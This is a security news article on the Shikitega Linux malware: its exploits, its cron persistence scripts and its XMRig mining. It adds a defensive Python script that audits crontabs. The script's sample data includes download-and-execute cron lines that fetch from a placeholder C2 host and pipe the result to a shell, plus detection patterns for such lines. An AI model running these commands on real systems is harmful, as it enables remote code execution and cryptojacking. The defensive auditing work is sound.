The identity and goals of the authors are as yet unknown, but the technical details have been disclosed. The malware seems to leverage the infamous Pwnkit vulnerability (CVE-2021-4034), one of the easiest exploits imaginable, and OverlayFS (CVE-2021-3493), a kernel exploit that pentesters, capture-the-flag (CTF) players, and hackers know all too well.
Indeed, the two flaws were patched months ago, but many systems aren’t up to date and thus still vulnerable.
Researchers dubbed the malware “Shikitega.” They did not explicitly say if it’s related to the use of the polymorphic XOR additive feedback encoder “Shikata Ga Nai,” but that seems like a good possibility.
Multistage Infection Chain
The Shikitega attack consists of a “multistage infection chain where each module responds to a part of the payload and downloads and executes the next one,” the AT&T researchers wrote. The attackers can gain escalated privileges quickly, which allows them to persist and execute the cryptominer.
Shikitega uses legitimate cloud services to host some of its C2 (command and control) servers and a very small ELF dropper (370 bytes) to initiate the next stages. Each module focuses on a single task, for example downloading and executing the Metasploit Meterpreter, escalating privileges on the targeted system, or maintaining persistence.
The researchers said the attackers have encoded the final payload with several layers, requiring several loops of decoding before it gets deployed, making it impossible to detect by signature-based antivirus solutions.
Five Scripts Provide Persistence
The researchers found five different scripts that together set four cron jobs, which are recurring tasks scheduled on a computer system. Two of the jobs are created for the current user and the other two for the root account.
If the crontab command is not available on the machine, which is unlikely on a Linux distribution, the malware can install it and start the service. Researchers provided the names and the purpose of these scripts:
- unix.sh: installs and starts the crontab service
- brict.sh: adds user crontab to execute the cryptominer
- politrict.sh: adds root crontab to execute the cryptominer
- truct.sh: adds user crontab to download the cryptominer from C&C
- restrict.sh: adds root crontab to download the cryptominer from C&C
Once the cron jobs are set, the downloaded files are no longer needed, so the malware deletes them to evade detection.
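The persistence described above leaves a recognizable footprint: cron entries that fetch a payload from a remote host, pipe it into a shell, or run something out of a temporary directory. The following audit script is an added example written for this article, not code from the AT&T report or from the malware; it parses crontab text into schedule and command, applies a handful of generic heuristics, and reports the entries that match. The crontab contents, the `c2.example.invalid` and `pool.example.invalid` hostnames, and the `/tmp/.x` and `/dev/shm/.m` paths are constructed sample data, not indicators from the report.

```python
import re
from dataclasses import dataclass, field

# Generic heuristics a defender would apply to a cron command. They are not
# signatures from the AT&T report; tune them for your environment.
INDICATORS = {
    "remote_download": re.compile(r"\b(curl|wget)\b[^|;&]*https?://", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b", re.I),
    "temp_exec": re.compile(r"(^|[\s;&|])(/tmp|/dev/shm|/var/tmp)/\S+", re.I),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)", re.I),
    "miner_name": re.compile(r"xmrig", re.I),
}


@dataclass
class Finding:
    user: str
    schedule: str
    command: str
    indicators: list = field(default_factory=list)


def parse_crontab_line(line):
    """Split one crontab line into (schedule, command).

    Returns None for blank lines, comments and VAR=value assignments.
    Handles both the five-field form ("*/5 * * * * cmd") and the
    "@reboot cmd" style keywords.
    """
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
        return None
    if line.startswith("@"):
        parts = line.split(None, 1)
    else:
        parts = line.split(None, 5)
        if len(parts) < 6:
            return None
        parts = [" ".join(parts[:5]), parts[5]]
    if len(parts) < 2:
        return None
    return parts[0], parts[1]


def audit_crontab(user, text):
    """Return a Finding for every entry in `text` that matches at least one indicator."""
    findings = []
    for line in text.splitlines():
        parsed = parse_crontab_line(line)
        if not parsed:
            continue
        schedule, command = parsed
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if hits:
            findings.append(Finding(user, schedule, command, hits))
    return findings


# Constructed sample crontabs: one legitimate job per user plus entries that
# mimic download-and-execute and miner-launch persistence.
USER_CRONTAB = """
MAILTO=""
0 3 * * * /usr/bin/rsync -a /home/alice/docs /mnt/backup/
*/5 * * * * /tmp/.x/xmrig -o pool.example.invalid:3333 >/dev/null 2>&1
@reboot curl -s http://c2.example.invalid/truct.sh | sh
"""

ROOT_CRONTAB = """
17 * * * * run-parts /etc/cron.hourly
*/10 * * * * wget -q -O /dev/shm/.m http://c2.example.invalid/m && chmod +x /dev/shm/.m && /dev/shm/.m
"""


def audit_samples():
    """Run the audit over both constructed crontabs and return all findings."""
    return audit_crontab("alice", USER_CRONTAB) + audit_crontab("root", ROOT_CRONTAB)


if __name__ == "__main__":
    for f in audit_samples():
        print(f"[{f.user}] {f.schedule} :: {f.command}")
        print(f"    indicators: {', '.join(f.indicators)}")
```

On a live system the same `audit_crontab` function can be fed the output of `crontab -l -u <user>` for each account, or the files under the cron spool directory (its location varies by distribution, so it is left out of the example). The two legitimate jobs produce no findings; the miner launch, the `curl | sh` line and the `wget` into `/dev/shm` are each flagged with the indicators that matched.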
Cybercriminals Use C2 Servers to Deploy Cryptominer
Shikitega installs XMRig version 6.17.0 from the C2 servers once persistence is achieved. The infamous XMRig mines Monero, a cryptocurrency favored by criminals because it is anonymity-focused and its transactions are particularly hard to trace.
Researchers noticed that the cybercriminals hosted some of their C2 servers on legitimate cloud services such as OVH. This strategy is a trade-off: such servers are much easier for authorities to take down, but they bypass network security products that don’t block traffic to legitimate providers.
How to Protect Against Shikitega
AT&T labs provided a list of IoCs (indicators of compromise) that system administrators can use to add specific rules to security solutions.
Advanced configuration hardenings are strongly recommended. Employees should be trained against various social engineering and phishing attacks, as it’s a classic vector used by cybercriminals to deploy malware.
Last but not least, systems need to be patched, which means sysadmins must update all devices, especially Linux systems, as Linux malware is skyrocketing in 2022 — another threat reported this week is a Linux version of the Windows SideWalk backdoor. Of course, it can be hard to keep pace with the release cycles, and updates can introduce nasty regressions and bugs.
However, having devices that can be abused by Pwnkit and OverlayFS unnecessarily exposes your system to a large range of adversaries.